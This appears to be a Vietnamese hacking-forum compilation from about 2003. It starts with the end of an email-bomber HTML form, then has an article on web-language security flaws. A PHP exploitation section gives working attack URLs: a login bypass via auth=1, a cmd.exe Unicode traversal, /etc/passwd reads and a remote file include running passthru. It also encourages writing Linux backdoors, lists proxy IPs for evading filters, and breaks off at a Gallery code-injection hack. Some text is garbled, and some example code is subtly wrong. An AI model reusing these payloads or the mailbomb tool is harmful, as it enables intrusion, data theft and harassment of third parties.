face="Verdana">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
* Muốn bao nhiêu lá thư:</font></td>
</CENTER>
<td width="358">
<p align="left">
<input type="text" name="messages" value="500">
</p>
</td>
</tr>
<CENTER>
<tr>
<td width="316"><font
face="Verdana">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
* &quot;Tặng&quot; cho thằng nà o??</font></td>
</CENTER>
<td width="358">
<p align="left"><font face="Verdana">
<input type="text" name="to">
</font></p>
</td>
</tr>
<CENTER>
<tr>
<td width="316"><font
face="Verdana">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
* Nội dung thế nà o (cấm
chá»­i):</font></td>
</CENTER>
<td width="358">
<p align="left">
<textarea name="message" cols="30" rows="5"></textarea>
</p>
</td>
</tr>
<CENTER>
<tr>
<td width="316">&nbsp;</td>
</CENTER>
<td width="358">
<input type="submit" name="action" value="BOMB">
</td>
</tr>
</table>
</form>
</BODY>
<p align="center"><font face="verdana" color="#575757"
size="-2">Designed and Copyright &copy; 2003 by PTV5 Group . All rights
reserved<br>
Contact us : </font></p>
</HTML>

Trở về đầu trang


--------------------------------------------------------------------------------

Các lỗi bảo mật

Trong thời điểm internet và các giao dịch, tương tác thông
qua internet phát triển rầm rộ như hiện nay, hàng loạt
các ngôn ngữ và các giao thức giao tiếp, thiết kế trang
web cũng ra đời để phục vụ cho những mục đích nhất
định. Có thể kể đến nhiều ngôn ngữ đã phổ biến
như HTML, DHTML, XML, Java, Perl, PHP, ColdFuson, ASP.. mỗi loại
có ưu và nhược điểm riêng.
Xét về tính đơn giản, gọn nhẹ thì HTML vẫn là lựa
chọn đầu tiên. Tuy nhiên, nếu trang web của bạn yêu cầu
khả năng tương tác cao hơn; liên kết và cập nhật dữ
liệu động; thể hiện thông tin, đồ họa phức tạp, thì
Java hay PHP là lựa chọn thời thượng. Để phục vụ tốt
cho mục đích phát triển trang web cá nhân hay tổ chức,
chúng ta sẽ đề cập sơ lược qua cách thức hoạt động
của một số ngôn ngữ và chuẩn web thông dụng, đồng
thời phân tích những yếu điểm của chúng liên quan đến
vấn đề bảo mật nếu có từ đó có thể chọn cho mình
một ngôn ngữ thích hợp.

1. HTML (Hyper Text Markup Language) - Ngôn ngữ đánh dấu siêu
văn bản
HTML được phát triển từ 1989 và được sử dụng rộng
rãi cho đến nay để trình bày các trang web dạng văn bản,
hình ảnh, âm thanh và các dạng ảnh động. Các chi tiết
kĩ thuật của ngôn ngữ HTML hiện nay được bảo hộ bởi
tổ chức W3C (World Wide Web Consortium - http://www.w3.org)/.
Một trang HTML là một tệp dữ liệu dạng text có phần
mở rộng dạng .htm, .html, .html4 - bao gồm tập hợp của
những thành phần HTML (HTML element). Những HTML element sẽ
được web browser hiểu và hiển thị trên màn hình thông
tin tương ứng với element đó. Ở đây chúng ta chỉ phân
tích về khía cạnh bảo mật của các HTML element thông
dụng.

<form> - Vùng chứa các đối tượng nhập thông tin của
người dùng. Các thành phần cho phép người dùng nhập
thông tin là khởi đầu của các nguy cơ về bảo mật. Ở
các chương trình thiết kế không tốt, nếu thông tin nhận
từ người dùng không phù hợp định dạng hoặc không như
mong muốn, chúng có thể tạo nên những kết quả khó
lường. Ví dụ một trang web trích thông tin của một
người dùng khi nhận tên đăng nhập và mật khẩu của
người đó, bằng cách cung cấp thông tin đặc biệt đánh
lừa hệ thống, người dùng có thể trích thông tin của
tất cả các user khác.

<form action> - Thuộc tính Action. Ta dùng thuộc tính này để
chỉ định một trình thực thi trên web server cho đối
tượng form. Ví dụ: <form action = "/login.cgi"> ... Khi biết
được tên chương trình, ta có thể tìm hiểu thêm các
thông tin có giá trị về web server, về thư mục hiện hành
của chương trình.

<form method> - Phương thức của form, định nghĩa cách thức
dùng để gửi thông tin người dùng nhập vào đến web
server cho chương trình xử lý. Khi hiểu được cách thức
gửi thông tin (POST và GET), hacker có thể theo dõi và bắt
các thông tin đựơc gửi trên mạng, thậm chí có thể thay
đổi chúng và gửi đi với giá trị khác để tạo ra
những kết quả khó lường.

<script language=<variable>>: Biến truyền vào là ngôn ngữ
script phía client, chẳng hạn như: javascript, vbscript, XML..
Khi thay đổi loại ngôn ngữ, hacker có thể vượt qua các
bộ lọc kiểm tra.

<input> - Edit control để nhập thông tin. Nếu ứng dụng web
không xử lý tốt các thông tin nhập vào, hacker có thể
lợi dụng nhập vào các giá trị đặc biệt đánh lừa
hệ thống và tạo nên những kết quả không mong muốn.
Những giá trị username và password dùng trong kĩ thuật SQL
Injection là ví dụ điển hình.

<input type=hidden> - Kiểu đối tượng input. Một số trang
web dùng đối tượng input với thuộc tính hidden để chứa
giá trị định trước như giá mua hàng ở các trang shopping
card. Lợi dụng đặc điểm này, hacker có thể thay đổi
giá trị này thành giá trị mong muốn và gửi đến web
server. Ở các trang web buôn bán, nếu không có những xử
lý giá trị phía server, hacker có thể mua được những món
hàng với giá giảm đáng kể.

<input maxlength=<variable>>: Giá trị maxlength xác định chiều
dài của giá trị nhập vào đối tượng input. Hacker có
thể thay đổi giá trị maxlength cho phép nhập vào những
giá trị hoặc chuỗi rất dài. Nếu chúng không được xử
lý thích hợp, chúng có thể gây nên những lỗi như tràn
bộ đệm, thậm chí có thể làm hỏng web server.

<input size=<variable>>: Tương tự như giá trị maxlength.

<applet> - Java applet. Thuộc tính này dùng để hiện và
chạy thẻ java applet. Java chạy và gửi thông tin thường
dưới dạng plain text nên có thể dùng các chương trình
theo dõi gói tin để bắt các thông tin này. Java byte-code có
thể dịch ngược để xem mã nguồn.

<object> Thuộc tính này dùng để thể hiện các đối
tượng ActiveX và Java applet. Lợi dụng thuộc tính này,
hacker có thể gửi email có nhúng HTML và đánh lừa người
dùng chạy các ActiveX control có thể đoạt quyền điều
khiển hệ thống. Đây cũng là một trong những cách tốt
nhất người ta lợi dụng để lan truyền virus trên mạng.

<embed> Thuộc tính này được dùng phối hợp với thẻ
<object> để nhúng các đối tượng ActiveX...

2. DHTML (Dynamic HTML)
DHTML là phiên bản mở rộng của HTML có phần mở rộng
dạng .dhtml. Nó giúp tăng cường tính tương tác của các
đối tượng điều khiển trong trang HTML tĩnh bằng cách cho
phép người ta dùng các script vbscript hoặc javascript điều
khiển chúng. Ví dụ một thẻ image để nhúng ảnh vào
trang web có thể nhận biết khi nào người dùng di chuyển
chuột trên nó bằng cách cài đặt hàm xử lý sự kiện
OnMouseOver, khi đó thông qua những xử lý thích hợp sẽ
làm đối tượng hình ảnh trở nên sống động hơn. Nhìn
chung, bên cạnh những mở rộng như tạo những hiệu ứng
MouseOver, chuỗi chữ di chuyển động, thay đổi màu
sắc..., các khía cạnh bảo mật của DHTML tương tự như
HTML vì nó dựa trên nền tảng HTML. Tuy nhiên hiện nay các
lập trình viên web ít chọn DHTML vì có một số trình
duyệt không hỗ trợ tốt cho nó, điển hình như Netscape.

3. XML (Extensible Markup Language) - Ngôn ngữ đánh dấu mở
rộng
Ngôn ngữ XML mới phát triển trong thời gian gần đây và
có thể sẽ được phổ biến rộng rãi trong tương lai,
chẳng hạn như ở các ngôn ngữ .NET. Không giới hạn và
định nghĩa sẵn như HTML, XML cho phép người dùng tự
định nghĩa ra các thành phần riêng và mở rộng tuỳ ý.
Tệp dữ liệu XML có phần mở rộng dạng .xml.
Bộ phận quan trọng nhất trong ngôn ngữ XML là bảng
định nghĩa DTD (Document Type Definitions). DTD dùng để định
nghĩa các thẻ mở và đóng của một tệp XML, giúp người
xem có một cái nhìn tổng quát về dữ liệu đang lưu
trữ.
Ví dụ ta cần định nghĩa cấu trúc dữ liệu Danh Sách
Sinh Viên, ta tạo một tệp DTD dssv.dtd như sau:

<!ELEMENT DSSV (SV*)>
<!ELEMENT SV(MASV, TEN, NS, LOP*)>
<!ELEMENT MASV(#PCDATA)>
<!ELEMENT TEN(#PCDATA)>
<!ELEMENT NS(#PCDATA)>
<!ELEMENT LOP(#PCDATA)>

Đây là ví dụ dữ liệu trong tệp XML:

<?xml version="1.0" ?>
<!DOCTYPE DSSV PUBLIC "." "dssv.dtd">
<DSSV>
<SV>
<MASV>95001</MASV>
<TEN>W_Hat</MASV>
<NS>19/11/1077</MASV>
<LOP>TH95</MASV>
</SV>
<SV>
.....
</SV>
</DSSV>

Dữ liệu trên thể hiện thông tin của một sinh viên với
mã số, tên, ngày sinh và lớp. Kí hiệu * nằm sau SV và LOP
chỉ định dữ liệu có thể chứa nhiều sinh viên, mỗi
sinh viên có thể có nhiều lớp.

4. Perl (Pratical Extraction and Report Language)
Perl là ngôn ngữ lập trình cấp cao được phát triển từ
năm 1987. Rất mạnh, tiện dụng và đồng thời là ngôn
ngữ được phổ biến miễn phí, hỗ trợ cho hầu hết
các hệ thống từ Winđowsx/NT/2k/XP, các phiên bản biến
thể của Unix đến hệ thống AS/400, MacOS, Novell
NetwarePerl...Perl đã và đang được sử dụng rộng rãi
hiện nay trên internet.
Perl được dùng chủ yếu cho các xử lý phía server, tuy
nhiên ta cũng có thể dùng perl để viết các ứng dụng
client, thậm chí có thể tạo nên ứng dụng chạy độc
lập để thực hiện một tác vụ tính toán nào đó.
Trên web server, perl thường được thực thi với CGI tạo
nên cơ chế xuất thông tin ra trình duyệt web. Hãy xem ví
dụ dùng perl để xử lý các thông tin nhập vào từ
người dùng trong đoạn html dưới đây:

<form method=POST action="/admin/login.pl"></form>
<html>
Username:
<input value="" size=80 maxlength=80 name="username">
Password:
<input value="" size=80 maxlength=80 name="password">
<input type=submit value="Login">
</html>

Sau khi người dùng nhập tên, mật khẩu và nhấn nút Login
những thông tin này sẽ được gửi đến chương trình perl
có tên login.pl nằm ở thư mục /admin/ trên web server.
Chương trình login.pl sau khi xử lý sẽ gửi kết quả
ngược về web client.

Khi sử dụng perl để thực hiện các xử lý phía server, ta
cần lưu ý một số điểm quan trọng sau có khả năng gây
nên những nguy cơ về bảo mật nghiêm trọng:
a - Tránh thực thi các web server dưới quyền quản trị
(root trong Unix và adminitrator trong Windows). Khi các script ở
web server được chạy có quyền quản trị sẽ rất nguy
hiểm nếu ai đó dùng nó để thực hiện các lệnh điều
khiển hệ thống. Các bạn có thể thấy script cgi-telnet là
một ví dụ cụ thể.
b - Luôn thực hiện tiền xử lý các thông tin người dùng
nhập vào, như các giá trị tên người dùng, mật khẩu,
giá cả...Tạo một chuỗi các kí tự hợp lệ tương ứng
với thông tin cần nhập và lọc ra những kí tự được
nhập không chính xác. Chẳng hạn với tên và mật khẩu
người dùng, ta có thể giới hạn ở các kí tự hợp lệ
sau: "0..9", "a..z", "A..Z"; không cho phép hoặc lọc bỏ các
kí tự đặc biệt như: "/\+)({}[]'-_=.|" ... Một ví dụ khác
về việc dùng perl thực hiện tiền xử lý với email
người dùng, với yêu cầu email phải có kí hiệu @ và
dấu chấm "." ở ít nhất là phần sau dấu @:

if ($email !~ /^[\w-]+\@[\w.-]+$/)
{
print "<br>#Error in your email. Please re-enter<br>";
}else
{
# thực hiện xử lý đối với thông tin email hợp lệ;
}

c - Hạn chế không cho phép thực thi các lệnh hệ thống
(shell command) như open(), fork(), system(), exec() hoặc cho thực
hiện sau khi đã kiểm tra chặt chẽ các tham số truyền
vào. Ở các hệ thống bảo vệ lỏng lẻo, hacker có thể
lợi dụng truyền các tham số không thích hợp vào các hàm
trên để thực hiện các lệnh xem thông tin và điều
khiển hệ thống.
d - Trên các hệ thống Unix, cần thiết lập các thông số
$PATH và $IFS bằng các giá trị chính xác cụ thể, tránh
dùng các biến môi trường.
Ví dụ ta đặt như sau:

$ENV{"PATH"}="/bin:/usr/bin:/opt";
$ENV{"IFS"}="/";

Việc chỉ định không rõ ràng các thông tin trên có thể
tạo điều kiện cho hacker sửa đổi chúng và bắt các
chương trình của chúng ta phải thực thi một chương trình
nguy hiểm nào đó ở nơi khác thay vì tại vị trí ta mong
muốn.
e - Kiểm tra kích thước và chiều dài của các thông tin
người dùng nhập vào hoặc dùng biến $ENV{CONTENT_LENGTH}
để hạn chế chiều dài của chuỗi dữ liệu cho các yêu
cầu GET/POST. Nếu không được kiểm tra chính xác, hacker
có thể gửi đi một lượng dữ liệu có giá trị rất
lớn hoặc rất dài có thể gây nên các lỗi tràn bộ
đệm, hỏng web server và thậm chí tìm được các điều
kiện phát sinh lỗi tràn bộ đệm và thực thi các lệnh
nguy hiểm từ xa.
f - Tránh cho phép chỉ định đường dẫn cụ thể ở các
trường dữ liệu hoặc ở các tham số truyền vào các
chương trình. Chỉ nên cho phép các đường dẫn mang tính
tương đối, cắt bỏ các giá trị có dạng dot dot ".."
hoặc slash "/\". Ở rất nhiều chương trình web không kiểm
tra đúng đã cho phép người dùng nhập các tham số ví dụ
như /../../../../etc/passwd (Unix) hoặc /../../../winnt/repair/sam._
(NT/2k) và dễ dàng lấy được các thông tin về mật
khẩu.
g - Sử dụng khả năng taint checking của perl để theo dõi
và kiểm tra giá trị của các biến.
h - Các chương trình perl được lưu trữ dưới dạng text
đơn giản do đó có thể dễ dàng bị xem mã nguồn và
lấy các thông tin có giá trị khác tên, mật khẩu truy
cập cơ sở dữ liệu...nếu hacker đoạt được quyền
điều khiển hệ thống hoặc có quyền xem hệ thống file.
Ta có thể dùng một số chương trình ví dụ như perl2exe
cho phép chuyển đổi các tệp perl dạng text sang dạng
chương trình thực thi .exe, như vậy có thể tránh được
việc bị xem mã nguồn và không còn cần trình thông dịch
perl khi chạy.

5. PHP (Personal Home Page)
Được phát triển từ năm 1995 và dần được bổ sung qua
một số phiên bản, cho đến nay PHP trở thành một trong
những ngôn ngữ script phía server phổ biến nhất bên cạnh
Perl và ASP (Active Server Pages). Tương tự như Perl, PHP có
dạng cú pháp, câu lệnh đơn giản, dễ hiểu - đặc biệt
thích hợp với các lập trình viên có hiểu biết về ngôn
ngữ C/C++ - đồng thời có ưu điểm là thực thi rất nhanh
và có thể chạy ở máy client hoặc như một ứng dụng
độc lập. Hiện nay người ta thường dùng PHP để thực
hiện các tác vụ xử lý phía server ở các web server trên
nền Unix, điển hình như Apache. Các chương trình PHP
thường có phần mở rộng là .php, .php3, .php4; mã PHP cũng
có thể nhúng vào một trang HTML. Hãy xem ví dụ sau thực
hiện in lên trình duyệt một chuỗi kí tự:

<!-- PHP Example in HTML
<html>
<?php
echo "<br>Hello World!<br>";
?>
</html>

Chú ý thẻ <? và ?> dùng để đánh dấu nơi bắt đầu và
kết thúc mã PHP.
Cho đến nay, những điểm yếu của PHP được phát hiện
tương tự như ở ngôn ngữ Perl. Đặc biệt khi sử dụng
PHP để nhận các thông tin nhập từ người dùng thông qua
trình duyệt và xử lý cơ sở dữ liệu bên dưới; hoặc
thực thi các lệnh hệ thống như system(), shellexec(), exec(),
passthru()...ta cần chú ý thực hiện việc kiểm tra và lọc
những dữ liệu truyền vào không hợp lệ để tránh
trường hợp người dùng nhập dữ liệu sai, đánh lừa
hệ thống sinh ra những kết quả không mong muốn, thậm
chí thực thi các lệnh từ xa.
Ví dụ sau thực hiện việc kiểm tra đơn giản trên chuỗi
$value có kiểu số, dùng hàm định nghĩa sẵn preg_match():

if (preg_match("/^[0-9]+$/i", $value))
echo "Invalid number!\n";
return 1;
break;

Các bạn tham khảo thêm các thông tin về PHP tại
http://www.php.net/

6. ColdFusion
ColdFusion (CF) là hệ thống phát triển ứng dụng web của
công ty Allaire (http://www.allaire.com) với phiên bản mới
nhất hiện nay là 5.0. CF có 3 thành phần chính bao gồm:
Application Server, Markup Language và Studio. Chúng ta sẽ tìm
hiểu sơ lược qua từng thành phần này.

Application Server (Máy chủ ứng dụng) - Đây là thành phần
chính của ColdFusion có thể chạy trên các nền Windows và
Unix. Application Server chạy trên web server và xử lý các yêu
cầu từ các trang mã ColdFusion.

Markup Languge (CFML) - Là ngôn ngữ web phía server được phát
triển tuân theo quy ước HTML bao gồm các thẻ và thuộc
tính của thẻ. CFML được dùng kết hợp với Application
Server tạo nên các các ứng dụng web như các shopping card,
quản lý tài khoản ngân hàng trực tuyến...Chương trình
ColdFusion có phần mở rộng bắt buộc là .CFM.
Tương tự như Perl và PHP, các tệp CFM được lưu trữ
ngầm định dưới dạng text đơn giản do đó chúng có
thể dễ dàng bị xem mã nguồn dẫn đến lộ những thông
tin quan trọng. Về mặt cấu trúc CFM giống như HTML ở
chổ dùng các thẻ tag để thực hiện hầu hết các tác
vụ chẳng hạn như kết nối cơ sở dữ liệu, hỗ trợ
POP (Post Office Protocol) và SMTP (Simple Mail Transfer Protocol),
COM (Component Object Model). Ngoài ra, có rất nhiều third-party
add-ons được viết ra để tăng cường các tính năng của
ColdFusion, tuy nhiên chúng thường không được cung cấp
miễn phí.
Ví dụ sau dùng CFM để mô tả một câu lệnh rút trích
dữ liệu:

<CFQUERY DATASOURCE="QLSV" NAME="SV">
SELECT MaSV, NameSV, BD
FROM DSSV WHERE MaSV = #URL.MaSV#
</CFQUERY>

Thuộc tính DATASOURCE của thẻ <CFQUERY> xác định một ODBC
data source (nguồn dữ liệu). Thuộc tính NAME được dùng
sau này khi cần trình bày kết quả lên browser.
Khi thực hiện trên browser, URL có dạng như sau:
http://www.anysite.com/cfm/getdata.cfm?MaSV=TH001
Như vậy, nếu các tham số truyền vào không được kiểm
tra và lọc tốt, người dùng có thể truyền vào các giá
trị không chuẩn làm thay đổi điều kiện của câu lệnh
SELECT, dẫn đến việc họ có thể lấy được toàn bộ
dữ liệu của các sinh viên khác.
Để trình bày kết quả của câu lệnh SELECT trên, hãy tham
đoạn mã sau:

<HEAD>Thong Tin Sinh Vien</HEAD>
<CFOUTPUT QUERY="SV">
<LI>#NameSV#, #BD#, (#MaSV#)</LI><BR>
</CFOUTPUT>


Studio - Cung cấp một môi trường cho người dùng phát
triển các ứng dụng web.

Cho đến nay, có 2 vấn đề bảo mật thường gặp với CFM
là việc lọc không tốt các tham số truyền vào và cung
cấp sẵn nhiều script ví dụ (như openfile.cfm, exprcalc.cfm)
mà hacker có thể lợi dụng để dùng cho mục đích của
mình như upload file, xem nội dung file, điều khiển các
dịch vụ web hoặc thậm chí thực thi các lệnh nguy hiểm
khác.
Giải pháp đơn giản để giảm nguy cơ bị tấn công là
xóa bỏ các script cung cấp sẵn không cần thiết hoặc
cập nhật các bản sửa lỗi cho các script và lọc kĩ các
giá trị truyền vào.

7. ASP (Active Server Pages)
ASP là môi trường ngôn ngữ script phía server của Microsoft
phát triển chủ yếu phục vụ cho các web server IIS (Internet
Information Server). ASP có thể được dùng kết hợp với
HTML, mã script và các thành phần ActiveX phía server tạo nên
các trang thông tin có nội dung động; thực thi các lệnh
hệ thống, kết nối cơ sở dữ liệu, COM...
Ngôn ngữ ngầm định dùng cho ASP là VBScript, đây là phiên
bản script của ngôn ngữ Visual Basic quen thuộc. Tương tự
một số ngôn ngữ script khác, có 2 dạng VBScript dùng cho
ASP. Với script phía server, ta đặt mã lệnh trong thẻ <%@
và %>; phía client, ta dùng thẻ HTML <script>

Trở về đầu trang

Lỗi bảo mật của PHP

Chào các bạn , hẳn các bạn biết đến ngôn ngữ
lập trinh php qua nhưng site đối thoại với nhưng người
dùng . php là 1 ngôn ngữ mạnh nó giup tiết kiệm dung
lượng file và làm cho quá trinh duyệt trở nên nhanh hơn .
Ngôn nhữ PHP là 1 ngôn ngữ mạnh viết cho mạng , nó có
thể execute nhưng ra lệnh của người sử dụng để đem
đén cho người dùng 1 hiệu quả làm việc nhanh nhất .
Ngôn ngữ PHP phục vụ cho mạng có nhưng đặc tính sau :
Phiên Dịch
Thực hiện nhanh - không có fork() , hoặc khi cài đặt php
không có gì khó khăn Giàu đặc tính - Có nhưng điều
không bình thờng trong hàm "builtin" Có cú Pháp đơn giản -
Chú ý đến hàm wordy .

Qua đây tôi sẽ có gắng giải thích về sự bảo mật và
tấn công khi ta thêm nhưng ký tự vao nhưng file PHP thông qua
2 đặc tính cuối cùng .

những cảnh báo và phạm vi

Ta có thể cài đặt PHP 4.0.4pl1 (voi MySQL, PostgreSQL, IMAP va
OpenSSL support enabled) chạy như 1 modun dưới Apache 1.3.19
trên 1 máy Linux
những biến trong PHP không phải được khai báo , chúng tự
động được tạ ra lần đầu khi chúng sử dụng . Đây
là 1 đặc tính hữu ích rõ ràng trong một ngôn ngữ phát
triển nhanh ứng dụng .

Khai Thác :

Ok ! Chúng ta bắt đầu khai thác những vấn đề bảo mật
trong PHP .
Ví dụ ta có 1 HTML snippet :

<FORM METHOD="GET" ACTION="test.php">
<INPUT TYPE="TEXT" NAME="hello" size="20">
<INPUT TYPE="SUBMIT">
</FORM>

Cái này rõ ràng trình bày 1 hộp văn bản và 1 nút bấm .
Khi nào ngờ dùng nhấn sumit thì file test.php sẽ được
chạy để xử lý đầu vào . Khi nó chạy biến chứa trong
hộp văn bản sẽ được ghi vào . Chính nhờ vào điều
này mà những người muốn tấn công hệ thống từ xa có
thể tạo ra bất kỳ biến nào mà chúng muốn và nó
được khai báo trong global namespasce . Nếu thay vào đó
việc sử dụng mẫu để ở trên để gọi test.php , một
Hacker gọi nó trực tiếp với 1 URL :

"http://server/test.php?hello=hi&setup=no" nó sẽ được thực thi
với nhưng biến mới .

Một Ví dụ trong việc dùng file test.php dùng để đăng
nhập mật khẩu :

<?php
if ($pass = "hello")
$auth = 1;
...
if ($auth == 1)
echo "some important information";
?>

Trong thao tác bình thường ở trên mã sẽ kiểm tra mật
khẩu để quyết định phải chăng người dùng từ xa đã
thành công trong việc đăng nhập . Nhưng bạn hãy nhớ ràng
1 Hacker có thể tạo ra nhưng biến trong global namespace .
Với 1 url ta có thể vượt qua được sự kiểm ra password :


http://server/test.php?auth=1

Bạn sẽ có quyền vào những nơi mà không có quyền vào .

Chúng ta hãy quan tâm tìm hiểu về những mảng như :
HTTP_GET/POST_VARS[] ;HTTP_GET_VARS ; HTTP_POST_VARS ; HTTP_COOKIE_VARS
; HTTP_POST_FILES ; HTTP_POST_FILES ,
Thật sự tôi không thể giải thích cho các bạn những
thẻ trên có tác dụng gì cho Hacker . Mình xin trả lời ,
Bạn có thể tìm kiếm thông tin như cookie , có khả năng
xử lý file , nếu như bạn có thể đưa ra những biến
thích hợp .


Remote File (Điều khiển file từ xa)

Bạn hãy xem đoạn mã sau :

<?php
if (!($fd = fopen("$filename", "r"))
echo("Could not open file: $filename
\n");
?>

Đây là code dùng để cho phép đọc 1 file , và thông báo
lỗi khi không có file . Cái này nói lên rằng ta có thể
đọc file password /ect/passwd nếu thông qua 1 Script
Ta có thể ví dụ :

"http://target/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir"

PHP sẽ ra lệnh cho 1 HTTP request tới server và cố gắng khai
thác sự bất thường trong Unicode .

Chính nhờ sự hỗ trợ của các hàm include(),
require(), include_once() and require_once(). sẽ giúp chúng ta
thực hiện được nhưng Script . thông qua Url

Bạn hãy xem đoạn code sau :

<?php
include($libdir . "/languages.php");
?>

Trong đó file languages.php có nội dung sau :

<?php
passthru("/bin/ls /etc");
?>

Vậy khi $libdir được gửi tới http:/// ( một webserver )
thì PHP sẽ ra lệnh cho 1 HTTP request tới /ect và trả lại 1
danh sách của /etc tới browser của người dùng . Chính vì
đó mà Hacker có toàn bộ thông tin trong server nếu họ
muốn .


File Upload

Trong khi ngôn ngữ PHP chưa cung cấp đủ cho nhưng Hacker
để làm cho cuộc sống dễ chịu hơn , thì ngôn ngữ hỗ
trợ cho RFC 1876 đặt cơ sở làm cho việc upload file dễ
dàng hơn .
Bạn hãy xem đoạn code sau :

<FORM METHOD="POST" ENCTYPE="multipart/form-data">
<INPUT TYPE="FILE" NAME="hello" size="20">
<INPUT TYPE="HIDDEN" NAME="MAX_FILE_SIZE" VALUE="10240">
<INPUT TYPE="SUBMIT">
</FORM>

Mẫu dạng này sẽ cho phép người dùng browser tự lựa
chọn nhưng file trên máy tính của mình rồi upload tới
người phục vụ mạng từ xa . Rõ ràng đây là một cách
upload tốt nhưng sự đáp lại của PHPs chính là tiềm tàng
nguy hiểm . ở mẫu trên khi ta upload file thì PHP bắt đầu
phân tích nội dung file upload , thẻ $MAX_FILE_SIZE quy định
chỉ những file có dung lượng tối đưa là 10240 b mới
được phép upload . Sau khi qua sự kiểm tra của PHP nó sẽ
cho phép ghi lên ổ cứng vào 1 vùng tạm thời .

Các bạn hãy xem mẫu ví dụ sau :

$hello = Filename on local machine (e.g "/tmp/phpxXuoXG")
$hello_size = Size in bytes of file (e.g 1024)
$hello_name = The original name of the file on the remote system (e.g
"c:\\temp\\hello.txt")
$hello_type = Mime type of uploaded file (e.g "text/plain")

người tấn công có thể gọi trực tiếp ra trên Browser :

http://vulnhost/vuln.php?hello=/etc/passwd&hello_size=10240&hello_type=text/

plain&hello_name=hello.txt

Hoặc xem code sau :

$hello = "/etc/passwd"
$hello_size = 10240
$hello_type = "text/plain"
$hello_name = "hello.txt"

He he .... Tất cả nội dụng của những bí mật sẽ
được phơi bày qua những thẻ upload như thế này .

Tuy nhiên ở những phiên bản mới hơn của PHP có đưa ra
phương pháp hữu hiệu trong việc quản lý file và dò xét
file upload . Họ đưa ra mảng HTTP_POST_FILES[]
Nhưng có rất nhiều webserver vẫn sử dụng những phiên
bản cũ .

Trong khi xem xét kẽ tấn thông qua chỗ upload hãy xem mã PHP
sau :
<?php if (file_exists($theme)) // Checks the file exists on the local
system (no remote files) include("$theme"); ?>

Nếu người tấn công có thể điều khiển $theme thì họ
có thể đọc được toàn bộ nội dung trong hệ thống ,
thậm chí họ có thể thực thi các file trên hệ thống .
Vì vậy người tấn công bắt buộc phải có những mã PHP
này để tạo ra những biến mới để đưa vào trong PHP
nguyên bản . Và rồi sự kiểm tra của file_exist sẽ
được thông qua và mã sẽ được chạy .

Còn 1 số phần bảo mật trong PHP nữa nhưng nó cũng không
quan trọng . nếu các bạn có thời gian thì nên xem
Library Files .

Tôi viết bài này dành cho những người lập trình PHP
(nếu bạn không biết về ngôn ngữ PHP đành chịu)

Bạn hãy viết những con Backdoor cho hệ thống Linux nếu
bạn muốn . Giống như con remview thì tuyệt đấy chứ .

Trở về đầu trang


--------------------------------------------------------------------------------

Firewall và cách vượt Firewal

Có nhiều khi các quí ông quí bà ở Việt Nam muốn chui
vào một trang web nhạy cảm nào đó để...nghiên cứu cho
biết thì ôi thôi, một cái thông báo đang ghét hiện ra
với yêu cầu bạn hãy nhập mật khẩu, đó chính là bức
tuờng lửa đã được nhà cung cấp dịch vụ dựng lên
nhằm ngăn cấm người sử dung truy cập vào site nào đó.
TRong bài viết nay tôi sẽ giới thiệu cho các bạn về
cách vượt bức tường lửa một cách dễ dàng bằng việc
sử dụng proxy. Vậy proxy là gi? Nói một cách dễ hiểu
đó chính là bộ đệm giúp bạn khi truy cập vào một trang
web sẽ đánh lừa được bức tường lửa do ISP dựng lên.

Có 3 cach de vuot tuong lửa mà hôm nay tôi sẽ giới thiệu
với các bạn:
+thu nhat:muon truy cap toi 1 dia chi ma bi firewall chan lai (vi du
www.geocities.com) ban hay danh nhu sau :
http://www.hideip.com/proxy/www.geocities.com
ro rang la chung ta di qua 1 web trung gian la hideip .no lam viec nhu
sau:khi anh em gui yeu cau toi server cua hideip thi website se gui tra
loi toi server nay va gui thong tin ve website do toi server cua isp
cua ban nhung da thay doi thong tin ve website nhu vay thuc chat da
danh lua duoc isp.
Nhung chung ta cung phai de cap toi van de xay ra la co the cac nha
cung cap dich vu se biet website cua hideip nen ho se chan chinh
website nay bang firewall.vi the chung ta hay xet cach thu 2:
+thu 2:cach nay tuong doi phuc tap va khong phai luc nao cung dat
duoc.gia sử các bạn biet duoc dia chi cua cac proxy mien phi toi
gi ma chung ta khong dung no de vuot tuong lua!van de o day chac anh em
da hieu roi:nghia la chung ta se gui thong tin yeu cau qua cac server
do, luc nay cac isp se hoan toan khong biet gi ve các bạn ,o dau den
va di ve dau.
Tro lai vi du tren các bạn muon truy cap den www.geocities.com anh
em hay danh vao
http://proxya:port/proxyB:port/http://www.geocities.com

Khi ca 2 cach tren deu khong duoc ta se xet them cach thu 3
+thu 3:cach nay lai rat de va dam bao 110% thanh cong!hehehe!!!!1nhung
xin bao truoc no se lam giam toc do duyet web cua bạn day!cho nen neu
duong truyen cua anh em ma cham thi dung nen ap dung cach nay truoc het
hay dow chuong trinh anonymity 4 proxy cau hang
iNetPrivacy(www.inetprivacy.com)
chuong trinh nay se lam mot proxy ao tren may cua anh em va luc nay anh
em cu yen tam ma vao bat cu trang web nao ma khong gap tro ngai nao!

Sau đây là một ví dụ, bạn hay vào trang web dưới đây,
http://www.chasoft.now.nu/ sau đó bạn có thể vào được bất
ky trang web nào minh muốn mà không bi tường lửa quáy rầy
nữa. Tôi cung se giới thiệu cho bạn môt số proxy miễn
phí và bạn co thể dung nó đê truy cp vao những trang bạn
muốn ma không hề sợ fire wall nữa. Chuc bạn thành công
nhớ đừng vào những trang web không lành mạnh nhé hihiiDanh
sách

một vài proxy vượt firewall

Bạn vào net ở nhà thì bạn mở IE lên rồi vào tool ->
internet Option -> connections -> setting đánh dấu 2 mục ở
proxy server. Chỗ address và port bạn điền vào những thứ
này tùy ý bạn chọn

68.202.81

138.81.11.3

144.92.104.66

210.99.199.227

ws13.lumedia.fi:80

218.65.110.14:80

218.145.25.47:80

211.233.80.64:80

211.233.80.22:80

211.233.27.189:80

203.113.34.239:80

24.41.27.57

170.224.224.37

217.172.180.178

210.146.44.245

63.100.18.2:80

63.193.207.2:80

211.100.0.34:80

61.142.169.98:80

163.29.140.66:80

Hack Web

Kỹ thuật hack Web thông qua lỗi Gallery ( một dạng của
lỗi php code inject ):

_ Gallery là một công cụ cho phép tạo một gallery ảnh
trên web được viết bằng PHP , lợi dụng sơ hở này ta
có thể lợi dụng để viết thêm vào đó một mã PHP cho
phép ta upload , đó chính là mục đích chính của ta .

